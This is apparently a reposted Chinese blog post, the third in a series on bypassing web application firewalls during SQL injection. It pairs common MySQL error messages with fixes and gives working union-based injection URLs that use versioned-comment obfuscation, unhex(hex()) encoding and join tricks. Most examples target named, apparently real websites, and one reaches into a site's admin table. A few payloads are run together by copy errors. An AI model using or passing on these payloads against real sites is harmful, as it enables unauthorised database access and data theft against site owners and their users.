01
SQL注入常见错误解决方案
502-BAD GATEWAY
这个错误是块查询并绕过这个错误所需要使用unhex(hex(query))
例子:
http://arashidynamics.com/products_detail.php?id=-52+/*!50000unION*/ +/*!50000SEleCT*/+1,2,unhex(hex(schema_name)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+/*!information_schema*/.schemata+/*!12345LiMit*/ 1,1--
412 (1054)Unknown column 'xxx' in 'field list'
SQL JOIN 语法:
&id=10 union select * from (select Column_Number_1)Alias_Name join (selectColumn_Number_2)Alias_Name ETC.
http://testphp.vulnweb.com/listproducts.php?cat=10 union select * from (select 1)a join (select 2)b join (select 3)cjoin (select 4)d join (select 5)e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join(select version())k %23
Query failed:Unknown column '1' in 'order clause'
这个错误来自使用1的顺序。
例子:
http://www.outsourcing-today.ro/articol.php?id=6642' order by 1 -- -错误查询失败:Unknown column '1' in 'order clause'这意味着url后面有两个查询,我们不能使用union,所以它可能是两件事情
Subquery returns more than 1 row
子查询也可以位于FROM语句中(“inlinesubquery”)或SELECT语句中,但放置在SELECT语句中的查询必须返回单个值。查询的一个必要条件是它只返回一行或以其他方式在外部查询中包含某些关键字。关键字是ANY,ALL,IN或NOT IN。
例子:
www.xxx.com/products.php?catid=101+UNION+SELECT+1,2(select+llitemnumber+from+orders),4,5,6,7--error:error Subquery returns more than 1 rowthe solution will be by using limit 0,1www.xxx.com/products.php?catid=101+UNION+SELECT+1,2,(select+id+from+categories LIMIT 0,1),4,5,6,7--
The Injection Is Before ^ from mode
注入点位于^模式之前
例子:
当我们看到多个“AS”和“,”时,我们知道注入在“from”之前,注入在“select”和“from”之前,因此我们可以使用I.Q.D方法,直接使用基于联合的查询来直接注入查询。
The Injection point is after ^ From mode
例子:
zeryaboud.com/other.php?page=products1 and 0 union select 1,2,3,4,5,6,7 `&id=28&project=19
zeryaboud.com/other.php?page=products1 where 0 union select 1,version(),3,4,5,6,7 `&id=28&project=19
Operand should contain 1 column(s)
运算数至少包含一个列
例子:
http://www.soarland.com/CF_Card_Adapter-catalog-41 and polygon((select * from(select * fromC277915_shledlights.snh_base_admin)p)).html
解决方案将通过首先删除*并由1号码取代
select * fromselect 1 fromhttp://www.soarland.com/CF_Card_Adapter-catalog-41 and polygon((select 1 from(select * fromC277915_shledlights.snh_base_admin)p)).html
Error as New Line
行发生错误
例子:
www.purichpublishing.com/?module=swm_ecommerce&page=product_detail&categoryID=3' and 0 unionselect 1,2,3,4,5,6,7-- -
http://www.purichpublishing.com/? module=swm_ecommerce&page=product_detail&categoryID=3' and 0 unionselect 1,2,3,4,version(),6,7%60
往期回顾
如有侵权,请联系删除。
扫码关注我们
查看更多精彩内容
原文始发于微信公众号(长风实验室):系列 | Bypass Waf SQL Injection(3)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论